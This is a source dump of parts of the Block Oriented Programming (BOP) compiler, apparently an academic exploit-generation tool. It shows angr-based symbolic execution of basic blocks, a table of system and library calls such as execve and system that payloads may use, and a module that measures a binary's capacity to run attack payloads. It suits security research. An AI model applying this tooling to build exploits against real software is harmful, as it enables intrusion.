        # should get a symbolic value.
        # ---------------------------------------------------------------------
        # get ELF sections that give default values to their uninitialized variables
        bss  = self.__proj.loader.main_object.sections_map[".bss"]
        data = self.__proj.loader.main_object.sections_map[".data"]

        addr = state.se.eval(state.inspect.mem_read_address)
        # print '=== READ', hex(state.inspect.instruction), hex(addr)

        # check if address is inside .bss or .data sections
        if bss.min_addr  <= addr and addr <= bss.max_addr or \
           data.min_addr <= addr and addr <= data.max_addr:
                # This is also works, but is for Big Endian:
                #       state.memory.make_symbolic('mem', state.inspect.mem_read_address, length)

                # make address symbolic
                symv = state.se.BVS("mem_%x" % addr, state.inspect.mem_read_length << 3)
                
                state.memory.store(state.inspect.mem_read_address, symv, 
                                        state.inspect.mem_read_length, endness=archinfo.Endness.LE)

                # we should read it to update state.inspect.mem_read_expr
                state.memory.load(state.inspect.mem_read_address,
                                        state.inspect.mem_read_length, endness=archinfo.Endness.LE)


        # -------------------------------------------------------------------------------
        # Identifying dereferences is a two stage process. Here (1st step) we capture all
        # memory load information (which happens before the register write) that happen 
        # at this instruction (x64 has 1 distinct memory read per insruction; however 
        # instructions like popad do multiple register writes, but this is not an issue 
        # here).
        # -------------------------------------------------------------------------------
        self.__load[ state.inspect.instruction ] = (
                state.inspect.mem_read_address, 
                state.inspect.mem_read_length, 
                state.inspect.mem_read_expr         # this will be updated
        )

        # associate memory expression with memory address (needed for later on)
        self.__mem2addr[ state.inspect.mem_read_expr.shallow_repr() ] = \
                                (state.inspect.mem_read_address, state.inspect.mem_read_length)
      
        # extract memory symbolic variables
        self.__add_sym_vars( state.inspect.mem_read_address )    

        self.__callback_mutex = 0                   # release lock

   

    # ---------------------------------------------------------------------------------------------
    # __regwrite_callback(): This function is invoked every time that a register write operation
    #       is performed.
    #
    # :Arg state: Current state to write register to
    # :Ret: None.
    #
    def __regwrite_callback( self, state ):
        if self.__callback_mutex == 1:              # if mutex is taken, return
            return

        self.__callback_mutex = 1                   # get lock
        
        try:
            # get register that is being written
            reg = self.__proj.arch.register_names[state.inspect.reg_write_offset]
        except KeyError:                            # just in case
            return


        # TODO: Regwrite only checks writes, but it doesn't check if the previous value perists after
        #       .text:000000000040BCEA         mov     eax, [rbp+ac]
        #       .text:000000000040BCF0         cdqe
        #       .text:000000000040BCF2         shl     rax, 3
        #       .text:000000000040BCF6         mov     rcx, rax
        #       .text:000000000040BCF9         add     rcx, [rbp+nargv]
        # 
        # ('sudo' example)
        #
        # We should add some checks to test whether the regwrite is "mov" or something else


        # print '--------------- ', hex(state.addr), hex(state.inspect.instruction), reg, 
        #                           state.inspect.reg_write_expr


        # remember the "raw" value that is being written to the register
        self.__reg_rawval[ reg ] = state.inspect.reg_write_expr

        if reg not in HARDWARE_REGISTERS:           # we only care about specific registers
            self.__callback_mutex = 0               # release lock
            return        


        # -------------------------------------------------------------------------------
        # This is the 2nd step of the dereference identification process. At this point 
        # we match the instruction that writes a register with the instruction that read
        # from memory. This is because we want to match the memory read expression with
        # the register write.
        # -------------------------------------------------------------------------------
        elif state.inspect.instruction in self.__load:
            addr, length, _ = self.__load[ state.inspect.instruction ]


            # ok we have a dereference!
            deps   = [ ]                            # dependent registers
            symtab = { }

            # find register dependencies on the address (e.g., rsi on <BV64 rsi_44_64 + 0x18>)
            for sym, nam in self.__symreg.iteritems():
                # skip registers that are not symbolic (e.g., rbp)
                if isinstance(sym.args[0], str) and sym.args[0] in addr.shallow_repr():
                    deps.append(nam)
                    symtab[nam] = sym


            # there might be dependencies with constant memory addresses as well (i.e., reading
            # from global variables). Such dependencies are handled during trace searching, so 
            # we ignore them for now. However the register dependencies are needed to check
            # whether a register mapping is valid or not.


            # if "deps" has a single element, we know that a register is containted in "addr"
            # expression. If also that expression has a single node, we know that this will be
            # that register.
            if len(deps) == 1 and len([leaf for leaf in addr.recursive_leaf_asts]) == 1:
                memrd = length
            else:
                memrd = None

            
            # (if basic block has >1 dereferences on the same register, use the most recent one)
            self.regwr[ reg ] = {                   # set data
                'type'  : 'deref',
                'addr'  : addr,
                'deps'  : deps,
                'sym'   : symtab,
                'memrd' : memrd
            }


        # -------------------------------------------------------------------------------
        # The current approach for detecting dereferences is not transitive. Consider the
        # following example:
        #       mov rcx, [rsi + 0x10]
        #       mov rdi, rcx
        #
        # In the 2nd register write, rdi gets an unconstrained symbolic variable (e.g., 
        # <SAO <BV64 Reverse(symbolic_read_unconstrained_17_64)>>) and therefore it's of
        # type 'clob'. However, we want rdi to be treated in the same way with rcx, as
        # they both have the exact same value. Because SE engine gives a unique symbolic
        # variable on every memory cell, we can associate them with their addresses. 
        # Thus, when a register gets a random symbolic value, we can figure out whether
        # it is actually a dereference.
        # -------------------------------------------------------------------------------
        elif state.inspect.reg_write_expr.shallow_repr() in self.__mem2addr:
            addr, length = self.__mem2addr[ state.inspect.reg_write_expr.shallow_repr() ]

            # this code is copy-pasta from above
            deps    = [ ]
            symtab  = { }

            for sym, nam in self.__symreg.iteritems():
                if isinstance(sym.args[0], str) and sym.args[0] in addr.shallow_repr():
                    deps.append(nam)
                    symtab[nam] = sym


            if len(deps) == 1 and len([leaf for leaf in addr.recursive_leaf_asts]) == 1:
                memrd = length
            else:
                memrd = None


            self.regwr[ reg ] = {
                'type'  : 'deref',
                'addr'  : addr,
                'deps'  : deps,
                'sym'   : symtab,
                'memrd' : memrd
            }
            

        # -------------------------------------------------------------------------------

        self.__callback_mutex = 0                   # release lock



    # ---------------------------------------------------------------------------------------------
    # __sig_handler(): Symbolic execution may take forever to complete. To deal with it, we set
    #       an alarm. When the alarm is triggered, this singal handler is invoked and throws an
    #       exception that causes the symbolic execution to halt.
    #
    # :Arg signum: Signal number
    # :Arg frame: Current stack frame
    # :Ret: None.
    #
    def __sig_handler( self, signum, frame ):        
        if signum == signal.SIGALRM:                # we only care about SIGALRM

            # angr may ignore the exception, so let's throw many of them :P
            raise Exception("Alarm triggered after %d seconds" % ABSBLK_TIMEOUT)
            raise Exception("Alarm triggered after %d seconds" % ABSBLK_TIMEOUT)
            raise Exception("Alarm triggered after %d seconds" % ABSBLK_TIMEOUT)
            raise Exception("Alarm triggered after %d seconds" % ABSBLK_TIMEOUT)



    # ---------------------------------------------------------------------------------------------

    ''' ======================================================================================= '''
    '''                                     CLASS INTERFACE                                     '''
    ''' ======================================================================================= '''

    # ---------------------------------------------------------------------------------------------
    # __init__(): Class constructor. This function initializes the environment for the symbolic
    #       execution, it executes the basic block, and performs the abstraction.
    #
    # :Arg project: Instance of angr project
    # :Arg addr: Entry point of the basic block
    # :Ret: None.
    #
    def __init__( self, project, addr ):
        self.__proj  = project                      # we'll need these
        self.__entry = addr

        
        # ---------------------------------------------------------------------
        # initialize abstraction variables
        # ---------------------------------------------------------------------
        self.regwr      = { }                       # all register writes for that block
        self.memrd      = set()                     # all memory reads for that block
        self.memwr      = set()                     # all memory writes for that block
        self.conwr      = set()                     # all concrete memory writes for that block
        self.splmemwr   = [ ]                       # all memory register writes for that block
        self.call       = { }                       # function/system call (if any) for that block
        self.cond       = { }                       # conditional jumps (if any) for that block
        self.symvars    = { }                       # symbolic variables for memory
        self.__load     = { }                       # memory loads (for internal use)
        self.__mem2addr = { }                       # map between memory expressions and addresses

        self.__mem = { }
        self.__reg_rawval = { }

        # ---------------------------------------------------------------------
        # Create a blank state and prepare it for symbolic execution.
        #
        # TODO: Check options again
        # ---------------------------------------------------------------------
        inist = self.__proj.factory.blank_state(    # create a blank state
            addr=addr,                              # set address
            #mode='symbolic', 
            add_options={                           # configure options
                simuvex.o.AVOID_MULTIVALUED_READS,
                simuvex.o.AVOID_MULTIVALUED_WRITES,
                simuvex.o.NO_SYMBOLIC_JUMP_RESOLUTION,
                simuvex.o.CGC_NO_SYMBOLIC_RECEIVE_LENGTH,
                simuvex.o.NO_SYMBOLIC_SYSCALL_RESOLUTION,
                simuvex.o.TRACK_ACTION_HISTORY,
                
                # newly added option
                simuvex.o.SYMBOLIC_INITIAL_VALUES
            },
            remove_options=simuvex.o.resilience_options | simuvex.o.simplification           
        )

        # configure more options (add/remove)
        inist.options.discard(simuvex.o.CGC_ZERO_FILL_UNCONSTRAINED_MEMORY)
        inist.options.update( {
            simuvex.o.TRACK_REGISTER_ACTIONS,
            simuvex.o.TRACK_MEMORY_ACTIONS,
            simuvex.o.TRACK_JMP_ACTIONS,
            simuvex.o.TRACK_CONSTRAINT_ACTIONS }
        )

      
        # ---------------------------------------------------------------------
        # initialize all registers with a symbolic variable
        # ---------------------------------------------------------------------
        inist.regs.rax = inist.se.BVS("rax", 64)    # give convenient names
        inist.regs.rbx = inist.se.BVS("rbx", 64)
        inist.regs.rcx = inist.se.BVS("rcx", 64)
        inist.regs.rdx = inist.se.BVS("rdx", 64)
        inist.regs.rsi = inist.se.BVS("rsi", 64)
        inist.regs.rdi = inist.se.BVS("rdi", 64)


        # rbp may also needed as it's mostly used to access local variables (e.g., 
        # rax = [rbp-0x40]) but some binaries don't use rbp and all references are
        # rsp related. In these cases it may worth to use rbp as well.
        if MAKE_RBP_SYMBOLIC:
            inist.regs.rbp = inist.se.BVS("rbp",64) # keep rbp symbolic
        else:
            inist.registers.store('rbp', FRAMEPTR_BASE_ADDR, size=8, endness=archinfo.Endness.LE)
        
        # rsp must be concrete and properly initialized
        inist.registers.store('rsp', RSP_BASE_ADDR, size=8, endness=archinfo.Endness.LE)

        inist.regs.r8  = inist.se.BVS("r08", 64)
        inist.regs.r9  = inist.se.BVS("r09", 64)
        inist.regs.r10 = inist.se.BVS("r10", 64)
        inist.regs.r11 = inist.se.BVS("r11", 64)
        inist.regs.r12 = inist.se.BVS("r12", 64)
        inist.regs.r13 = inist.se.BVS("r13", 64)
        inist.regs.r14 = inist.se.BVS("r14", 64)
        inist.regs.r15 = inist.se.BVS("r15", 64)


        # ---------------------------------------------------------------------
        # Other initializations
        # ---------------------------------------------------------------------        
        # map symbolic names to registers

        # self.__symreg = { self.__getreg(inist, r):r for r in HARDWARE_REGISTERS }
        self.__symreg = { 
            inist.regs.rax : 'rax',
            inist.regs.rbx : 'rbx',
            inist.regs.rcx : 'rcx',
            inist.regs.rdx : 'rdx',
            inist.regs.rsi : 'rsi',
            inist.regs.rdi : 'rdi',
            inist.regs.rbp : 'rbp',
            inist.regs.rsp : 'rsp',
            inist.regs.r8  : 'r8',
            inist.regs.r9  : 'r9',
            inist.regs.r10 : 'r10',
            inist.regs.r11 : 'r11',
            inist.regs.r12 : 'r12',
            inist.regs.r13 : 'r13',
            inist.regs.r14 : 'r14',
            inist.regs.r15 : 'r15'
        }


        # UPDATE: Don't create a symbolic stack, as this consumes all the Virtual Memory and
        # may crash the machine. By carefully configuring rsp and rbp within the limit of virtual
        # page limit, we can achieve the same effect, so we don't need a symbolic stack.
        #
        # The main issue here are the permissions (stack may not appear as R+W), but as long as
        # both rsp and rbp point in the same page, there is no problem.
        #
        #
        #       # create a symbolic stack (required to have writable pages)
        #       stack = inist.se.BVS("stack", self.__proj.arch.bits * _STACK_SZ)     
        #
        #       # write symbolic stack to memory  
        #       # inist.memory.store(inist.regs.sp, stack, endness=archinfo.Endness.LE)                    
        #       inist.memory.store(STACK_BASE_ADDR, stack, endness=archinfo.Endness.LE)

        # when solver gives up (in milliseconds)
        inist.se._solver.timeout = ABSBLK_TIMEOUT*1000


        # ---------------------------------------------------------------------
        # Hooks for identifying dereferences
        # ---------------------------------------------------------------------
        self.__callback_mutex = 0                   # hooks are enabled

        inist.inspect.b('reg_write', when=angr.BP_BEFORE, action=self.__regwrite_callback)
        inist.inspect.b('mem_read',  when=angr.BP_AFTER,  action=self.__memread_callback)
        
        
        # -------------------------------------------------------------------------
        # Do the symbolic execution (using simulation managers)
        # ------------------------------------------------------------------------- 
        simgr = self.__proj.factory.simulation_manager(thing=inist)
        simgr.save_unconstrained = True             # do not discard unconstrained stashes


        signal.signal(signal.SIGALRM, self.__sig_handler)
        signal.alarm(ABSBLK_TIMEOUT)                  


        # make sure that you execute the normalized block
        # TODO: cleanup
        node = ADDR2NODE[self.__entry]
        num_inst = len(node.instruction_addrs) if node is not None else None
        if num_inst:
           simgr.step(num_inst=num_inst)
        
        else:
            simgr.step()                            # execute 1 basic block
    
        signal.alarm(0)                             # disable alarm


        if simgr.active:                            # check if execution was successful
            newst = simgr.active[0]                 # get the new state (after execution)

        elif simgr.unconstrained:
            # because we execute a single basic block, it's possible to end up in an state that
            # instruction pointer depends on symbolic data and hence to not know how to proceed
            # (i.e., unconstrained stash)
            newst = simgr.unconstrained[0]

        elif simgr.deadended:                       # check if execution can't continue (retq)
            newst = simgr.deadended[0]              # work with what you have
           
        else:                                       # everything else should generate an error
            print simgr.stashes
            raise Exception('There are no usable stashes!')


        # -------------------------------------------------------------------------
        # Analyze results and generate the abstractions
        # ------------------------------------------------------------------------- 
        self.__reg_w(newst)                         # analyze register writes
        self.__mem_r(newst)                         # analyze memory reads
        self.__mem_w(newst)                         # analyze memory writes
        self.__call(newst)                          # analyze function/system calls
        self.__cond(newst)                          # analyze conditional jumps


        # -------------------------------------------------------------------------
        # Apply (any) patches
        #
        # Instructions like 'rep movsq' incorrectly classify rsi and rdi in 'deref'
        # types. This is because angr assigns a basic block with a single rep* 
        # instruction (as VEX IR contains loops). To fix that, we simply mark the
        # used registers as clobbering.
        # ------------------------------------------------------------------------- 
        blk_insns = node.block.capstone.insns       # get block instructions

        if len(blk_insns) == 1 and 'rep' in blk_insns[0].insn.mnemonic:
            # name = blk_insns[0].insn.insn_name()    # get instruction name (w/o the rep*)
              
            # make 'rsi', 'rdi' and 'rcx' clobbering (all of them are modified)
            self.regwr['rdi'] = {'type' : 'clob'}    
            self.regwr['rsi'] = {'type' : 'clob'}
            self.regwr['rcx'] = {'type' : 'clob'}            


        '''
        print
        print '-------------------- Register Writes --------------------'                   
        for a, b in self.regwr.iteritems():
            print a, b

        print '-------------------- Memory Reads --------------------'            
        for a, b in self.memrd:
            print a, b

        print '-------------------- Memory Writes --------------------'            
        for a, b in self.memwr:
            print a, b

        print '-------------------- Concrete Writes --------------------'            
        for a, b in self.conwr:
            print a, b

        print '-------------------- SPL Memory Writes --------------------'            
        for a in self.splmemwr:
            print a

        print '-------------------- Calls --------------------'            
        print self.call

        print '-------------------- Conditional Jumps --------------------'            
        print self.cond
        '''



    # ---------------------------------------------------------------------------------------------
    # __getitem__(): An alternative way to get block "abstractions".  
    #
    # :Arg what: The name of the abstraction that you want to get
    # :Ret: The requested abstraction.
    # 
    def __getitem__( self, what ):
        try:
            return {
                'regwr'    : self.regwr,
                'memrd'    : self.memrd,
                'memwr'    : self.memwr,
                'conwr'    : self.conwr,
                'splmemwr' : self.splmemwr,
                'call'     : self.call,
                'cond'     : self.cond,
                'symvars'  : self.symvars
            }[ what ]
        except KeyError:
            return None                             # abstraction not found



    # ---------------------------------------------------------------------------------------------
    # __iter__(): Iterate over all abstractions. This function is a generator over all possible
    #       abstractions.
    #
    # :Ret: Each time function returns a different tuple (name, abstraction).
    # 
    def __iter__( self ):   
        yield 'regwr',    self.regwr
        yield 'memrd',    self.memrd
        yield 'memwr',    self.memwr
        yield 'conwr',    self.conwr
        yield 'splmemwr', self.splmemwr
        yield 'call',     self.call
        yield 'cond',     self.cond
        yield 'symvars',  self.symvars 



# -------------------------------------------------------------------------------------------------
'''
if __name__ == '__main__':                          # DEBUG ONLY
    import angr

    project = angr.Project('eval/opensshd/sshd', load_options={'auto_load_libs': False})    
    # project.analyses.CFGFast()                    # to prepare project.kb.functions

    # Problem: Inidirect pointers in .bss:
    #   .text:00000000004050B1         mov     rax, cs:public_key
    #   .text:00000000004050B8         mov     rdi, [rax+20h]          ; value
    #
    # abstr = abstract_ng(project, 0x4050B1)

    # abstr = abstract_ng(project, 0x416610)
    abstr = abstract_ng(project, 0x416631)

    # TODO: check me again!
    abstr = abstract_ng(project, 0x0x40c01f)

    for a, b in abstr:
        print '\t', a, b

    print 'done!'
'''
# -------------------------------------------------------------------------------------------------


================================================
FILE: source/calls.py
================================================
#!/usr/bin/env python2
# -------------------------------------------------------------------------------------------------
#
#    ,ggggggggggg,     _,gggggg,_      ,ggggggggggg,      ,gggg,  
#   dP"""88""""""Y8, ,d8P""d8P"Y8b,   dP"""88""""""Y8,  ,88"""Y8b,
#   Yb,  88      `8b,d8'   Y8   "8b,dPYb,  88      `8b d8"     `Y8
#    `"  88      ,8Pd8'    `Ybaaad88P' `"  88      ,8Pd8'   8b  d8
#        88aaaad8P" 8P       `""""Y8       88aaaad8P",8I    "Y88P'
#        88""""Y8ba 8b            d8       88"""""   I8'          
#        88      `8bY8,          ,8P       88        d8           
#        88      ,8P`Y8,        ,8P'       88        Y8,          
#        88_____,d8' `Y8b,,__,,d8P'        88        `Yba,,_____, 
#       88888888P"     `"Y8888P"'          88          `"Y8888888 
#
#   The Block Oriented Programming (BOP) Compiler - v2.1
#
#
# Kyriakos Ispoglou (ispo) - ispo@purdue.edu
# PURDUE University, Fall 2016-18
# -------------------------------------------------------------------------------------------------
#
#
# calls.py
#
# This module contains all declarations for system and library calls that SPL supports. A call is
# declared as a tuple (name, nargs, modregs):
#
#       name    : The library/system call name
#       nargs   : The number of its arguments. Set to INFINITY for variadic functions.
#       modregs : A list of all registers that are modified when the call returns. Note that rax 
#                 is always modified as it has the return value.
#
# To keep the implementation simple, We do not support library calls that take arguments on the
# stack.
#
# Also, it is possible to declare any custom calls that reside in the binary.
# -------------------------------------------------------------------------------------------------
from coreutils import *



# -------------------------------------------------------------------------------------------------
# Calling Conventions
# -------------------------------------------------------------------------------------------------
SYSCALL_CC = ['rdi', 'rsi', 'rdx', 'rcx', 'r8', 'r9']
LIBCALL_CC = ['rdi', 'rsi', 'rdx', 'r10', 'r8', 'r9']



# -------------------------------------------------------------------------------------------------
# Supported system calls
# -------------------------------------------------------------------------------------------------
syscalls__ = [
    # ssize_t read(int fd, void *buf, size_t count)
    ('read',    3,  ['rax', 'rcx', 'r10', 'r11']),

    # ssize_t write(int fd, const void *buf, size_t count)
    ('write',   3,  ['rax', 'rcx', 'r10', 'r11']),

    # void *sbrk(intptr_t increment)
    ('sbrk',    1,  ['rax', 'rcx', 'rdx', 'r10', 'r11']),

    # int brk(void *addr)
    ('brk',     1,  ['rax', 'rcx', 'rdx', 'r10', 'r11']),

    # int dup(int oldfd)
    ('dup',     1,  ['rax', 'rcx', 'r11']),

    # int dup2(int oldfd, int newfd)
    ('dup2',    2,  ['rax', 'rcx', 'r10', 'r11']),

    # unsigned int alarm(unsigned int seconds)
    ('alarm',   1,  ['rax', 'rcx', 'r10', 'r11']),


    '''
        Feel free to append more syscalls...
    '''
]



# -------------------------------------------------------------------------------------------------
# Supported library calls
# -------------------------------------------------------------------------------------------------
libcalls__ = [
    # int system(const char *command)
    ('system',  1,  ['rax', 'rcx', 'rdx', 'rdi', 'rsi', 'r8', 'r9', 'r10', 'r11']),

    # int puts(const char *s)
    ('puts',    1,  ['rax', 'rcx', 'rdx', 'rdi', 'rsi', 'r8', 'r9', 'r10', 'r11']),

    # int execve(const char *filename, char *const argv[], char *const envp[])
    ('execve',  3,  ['rax', 'rcx', 'rdx', 'r10', 'r11']),

    # int execv(const char *filename, char *const argv[])
    ('execv',   2,  ['rax', 'rcx', 'rdx', 'r10', 'r11']),
    
    # int execl(const char *path, const char *arg, ...);
    ('execl',   2,  ['rax', 'rcx', 'rdx', 'r10', 'r11']),

    # int printf(const char *format, ...)
    ('printf',  INFINITY,  ['rax', 'rcx', 'rdx', 'rsi', 'rdi',  'r8', 'r10', 'r11']),

    # ssize_t send(int sockfd, const void *buf, size_t len, int flags);
    # (we can ignore the 4th parameter for now)
    ('send',    3,  []),

    # void exit(int status)
    ('exit',    1,  []),


    '''
        Feel free to append more libcalls...
    '''
]



# -------------------------------------------------------------------------------------------------
# In case that you don't want to distinguish them
# -------------------------------------------------------------------------------------------------
calls__ = syscalls__ + libcalls__



# -------------------------------------------------------------------------------------------------
# Groups of function calls that have similar effects
# -------------------------------------------------------------------------------------------------
call_groups__ = [
    ['puts',   'printf'],
    ['execve', 'execv', 'execl' ],
]



# -------------------------------------------------------------------------------------------------
# find_syscall(): Search for a specific system call.
#
# :Arg name: Name of the syscall
# :Ret: If system call exists, function returns the associated entry in syscalls__. Otherwise None
#       is returned.
#
def find_syscall( name ):
    call = filter(lambda call: call[0] == name, syscalls__)

    if len(call) == 0:
        return None

    elif len(call) == 1:
        return call[0]

    else:
        raise Exception("System call '%s' has >1 entries in syscalls__ table." % name)



# -------------------------------------------------------------------------------------------------
# find_libcall(): Search for a specific library call.
#
# :Arg name: Name of the library call
# :Ret: If library call exists, function returns the associated entry in libcalls__. Otherwise None
#       is returned.
#
def find_libcall( name ):
    call = filter(lambda call: call[0] == name, libcalls__)

    if len(call) == 0:
        return None

    elif len(call) == 1:
        return call[0]

    else:
        raise Exception("Library call '%s' has >1 entries in libcalls__ table." % name)



# -------------------------------------------------------------------------------------------------
# find_call(): Search for a specific call (either library or system)
#
# :Arg name: Name of the call
# :Ret: If call exists, function returns the associated entry in calls__. Otherwise None is
#       returned.
#
def find_call( name ):
    sys = find_syscall(name)
    lib = find_libcall(name)

    return sys if sys else lib                      # logic OR



# -------------------------------------------------------------------------------------------------


================================================
FILE: source/capability.py
================================================
#!/usr/bin/env python2
# -------------------------------------------------------------------------------------------------
#
#    ,ggggggggggg,     _,gggggg,_      ,ggggggggggg,      ,gggg,  
#   dP"""88""""""Y8, ,d8P""d8P"Y8b,   dP"""88""""""Y8,  ,88"""Y8b,
#   Yb,  88      `8b,d8'   Y8   "8b,dPYb,  88      `8b d8"     `Y8
#    `"  88      ,8Pd8'    `Ybaaad88P' `"  88      ,8Pd8'   8b  d8
#        88aaaad8P" 8P       `""""Y8       88aaaad8P",8I    "Y88P'
#        88""""Y8ba 8b            d8       88"""""   I8'          
#        88      `8bY8,          ,8P       88        d8           
#        88      ,8P`Y8,        ,8P'       88        Y8,          
#        88_____,d8' `Y8b,,__,,d8P'        88        `Yba,,_____, 
#       88888888P"     `"Y8888P"'          88          `"Y8888888 
#
#   The Block Oriented Programming (BOP) Compiler - v2.1
#
#
# Kyriakos Ispoglou (ispo) - ispo@purdue.edu
# PURDUE University, Fall 2016-18
# -------------------------------------------------------------------------------------------------
#
#
# capability.py
#
# This module measures the capability of the program. That is, program's capability gives a good
# indication, on "what the program is capable of executing" in terms of SPL payloads. However, all
# these metrics, aim to identify *upper bounds*; that is, they overestimate the set of SPL programs
# that can be truly executed on this binary.
# -------------------------------------------------------------------------------------------------
from coreutils import *
from calls     import *
import path as P

import networkx as nx
import textwrap
import datetime
import cPickle as pickle
import math
import numpy



# -----------------------------------------------------------------------------
# Capability Options
# -----------------------------------------------------------------------------
CAP_ALL             = 0x00FF                        # all types of statements
CAP_REGSET          = 0x0001                        # register assignments 
CAP_REGMOD          = 0x0002                        # register modifications
CAP_MEMRD           = 0x0004                        # memory reads
CAP_MEMWR           = 0x0008                        # memory writes
CAP_CALL            = 0x0010                        # system and library calls
CAP_COND            = 0x0020                        # conditional statements
CAP_LOAD            = 0x0100                        # load the capability graph from a file
CAP_SAVE            = 0x0200                        # save the capability graph to a file
CAP_NO_EDGE         = 0x0400                        # don't calculate edges in capability graph

# types of analyses
CAP_STMT_COMB_CTR   = 'STMT_COMB_CTR'               # Count combinations of statements
CAP_STMT_MIN_DIST   = 'STMT_MIN_DIST'               # Count min distance between statements
CAP_LOOPS           = 'LOOPS'                       # Analyze loops



# -------------------------------------------------------------------------------------------------
# capability: This class is responsible for performing several measurements in the target binary.
#
class capability( object ):
    ''' ======================================================================================= '''
    '''                                   INTERNAL VARIABLES                                    '''
    ''' ======================================================================================= '''
    __cap = nx.DiGraph()                            # the capability graph (CAP)
    __uid = 0                                       # a unique ID
    


    ''' ======================================================================================= '''
    '''                                   INTERNAL FUNCTIONS                                    '''
    ''' ======================================================================================= '''

    # ---------------------------------------------------------------------------------------------
    # __add(): Add a node to the capability graph.
    #
    # :Arg addr: Address of the basic block tha contains the statement
    # :Arg ty: Statement type: regset / regmod / call / cond
    # :Arg reg: Register name (for regset/regmod/cond)
    # :Arg val: Statement's value (for regset/regmod/cond)
    # :Arg mode: Statement mode (const/deref for regset and syscall/libcall for call)
    # :Arg isW: A flag indicating whether "val" points to a writable address (for regset)
    # :Arg op: Statement operator (for regmod/cond)
    # :Arg mem: Memory address (for memrd/memwr)
    # :Arg name: Function name (for call)
    # :Ret: None.
    #
    def __add( self, addr, ty, reg=None, val=None, mode=None, isW=None, op=None, name=None, mem=None, size=None ):
        # NOTE: We assume that arguments are not malformed, so we don't do any checks
        cap = {
            'regset' : {'addr':int(addr), 'type':ty, 'reg':reg, 'val':val, '+W':isW, 'mode':mode},
            'regmod' : {'addr':int(addr), 'type':ty, 'reg':reg, 'op':op, 'val':val},
            'memrd'  : {'addr':int(addr), 'type':ty, 'reg':reg, 'mem':mem, 'size':size},
            'memwr'  : {'addr':int(addr), 'type':ty, 'mem':mem, 'val':val, 'size':size},
            'call'   : {'addr':int(addr), 'type':ty, 'name':name, 'mode':mode},
            'cond'   : {'addr':int(addr), 'type':ty, 'reg':reg, 'op':op, 'val':val}
        }[ ty ]                                     # nicely "switch" the appropriate statement
     
        self.__cap.add_node(self.__uid, **cap)      # add statement to the graph
        self.__uid += 1                             # update UID counter



    # ---------------------------------------------------------------------------------------------

    ''' ======================================================================================= '''
    '''                                     CLASS INTERFACE                                     '''
    ''' ======================================================================================= '''

    # ---------------------------------------------------------------------------------------------
    # __init__(): Class constructor. Simply initialize private variables.
    #
    # :Arg cfg: Program's CFG.
    # :Arg name: Program's filename
    #
    def __init__( self, cfg, name ):       
        self.__cfg  = cfg                           # save cfg to internal variables
        self.__name = name                          # program's filename



    # ---------------------------------------------------------------------------------------------
    # build(): Build the Capability Graph. This is a very slow process, so it's possible to save
    #       the graph once its generated, thus without having to re-calculate it the next time.
    #       
    # :Arg options: An integer that describes how the capability graph should be built. It can be
    #       the logical OR of one or more of the following:
    #
    #       CAP_ALL     | Include all types of statements in the graph
    #       CAP_REGSET  | Include register assignments in the graph
    #       CAP_REGMOD  | Include register modifications in the graph
    #       CAP_CALL    | Include system and library calls in the graph
    #       CAP_COND    | Include conditional statements in the graph
    #       CAP_LOAD    | Load the capability graph from a file
    #       CAP_SAVE    | Save the capability graph to a file
    #
    # :Ret: None.
    #
    def build( self, options=CAP_ALL ):
        dbg_prnt(DBG_LVL_1, "Exploring program's capability...")

        # ---------------------------------------------------------------------
        # Load Capability Graph from file ?
        # ---------------------------------------------------------------------       
        if options & CAP_LOAD:
            dbg_prnt(DBG_LVL_1, "Loading the Capability Graph from file...")

            try:
                self.__cap = nx.read_gpickle(self.__name + '.cap')

                dbg_prnt(DBG_LVL_1, "Done.")            

                return                              # your job is done here

            except IOError, err:
                # if you can't load it, simply re-calculate it ;)

                error("Cannot load Capability Graph: %s" % str(err))


        # ---------------------------------------------------------------------
        # Iterate over abstracted basic blocks
        # ---------------------------------------------------------------------       
        dbg_prnt(DBG_LVL_1, "Searching CFG for 'interesting' statements...")

        nnodes  = len(nx.get_node_attributes(self.__cfg.graph, 'abstr').items())
        counter = 1
        
        p = P._cfg_shortest_path(self.__cfg)


        for node, abstr in nx.get_node_attributes(self.__cfg.graph,'abstr').iteritems():
            addr = node.addr

            dbg_prnt(DBG_LVL_3, "Analyzing block at 0x%x (%d/%d)..." % (addr, counter, nnodes))
        

            if options & CAP_REGSET:
                for reg, data in abstr['regwr'].iteritems():

                    if data['type'] == 'concrete':
                        self.__add(addr, ty='regset', reg=reg, val=data['const'], mode='const',
                                         isW=data['writable'])

                    elif data['type'] == 'deref':
                        self.__add(addr, ty='regset', reg=reg, val=data['addr'], mode='deref')
          

            if options & CAP_REGMOD:
                for reg, data in abstr['regwr'].iteritems():
                    if data['type'] == 'mod':                                               
                        self.__add(addr, ty='regmod', reg=reg, op=data['op'], val=data['const'])


            if options & CAP_MEMRD:
                for reg, data in abstr['regwr'].iteritems():
                    if data['type'] == 'deref' and data['memrd']:
                        loadreg = data['deps'][0]

                        self.__add(addr, ty='memrd', reg=reg, mem=loadreg, size=data['memrd'])
        
            
            if options & CAP_MEMWR:
                for memwr in abstr['splmemwr']:
                    self.__add(addr, ty='memwr', mem=memwr['mem'], val=memwr['val'], size=memwr['size'])



            if options & CAP_CALL and abstr['call'] and find_call(abstr['call']['name']):
                self.__add(addr, ty='call', name=abstr['call']['name'], mode=abstr['call']['type'])


            elif options & CAP_COND and abstr['cond']:
            
                # elif because we can't have call and cond at the same basic block
                self.__add(addr, ty='cond', reg=abstr['cond']['reg'], op=abstr['cond']['op'],
                                 val=abstr['cond']['const'])


                '''
                # -----------------------------------------------------------------------
                # hacky way to quickly find a loop
                # -----------------------------------------------------------------------
                for length, loop in p.k_shortest_loops(addr, 0, 10):
                    length, loop = p.shortest_loop(addr)

                    R = abstr['cond']['reg']

                    regmod = 0
                    regset = 0
                    step = 0

                    if length < INFINITY:

                        for l in loop[:-1]:
                            try:
                                X = self.__cfg.graph.node[ADDR2NODE[l]]['abstr']
                            except KeyError:
                                continue
                
                            for reg, data in X['regwr'].iteritems():
                                if data['type'] == 'mod' and reg == R:
                                    regmod += 1
                                    step = data['const']

                                elif reg == R:
                                    regset += 1


                        if regmod == 1 and regset == 0:
                            emph(bolds('GOOD LOOP (%d - %d - %s) %s' % 
                                    (abstr['cond']['const'], step, abstr['cond']['op'], 
                                    pretty_list(loop))))

                        # else:
                        #    print 'BAD LOOP (mod: %d, set: %d) (%d - %d - %s) %s' % \
                        #        (regmod, regset, abstr['cond']['const'], step, abstr['cond']['op'],
                        #        pretty_list(loop))
                '''

            counter += 1                            # update counter

        dbg_prnt(DBG_LVL_1, "Done.")


        # ---------------------------------------------------------------------
        # Show some statistics
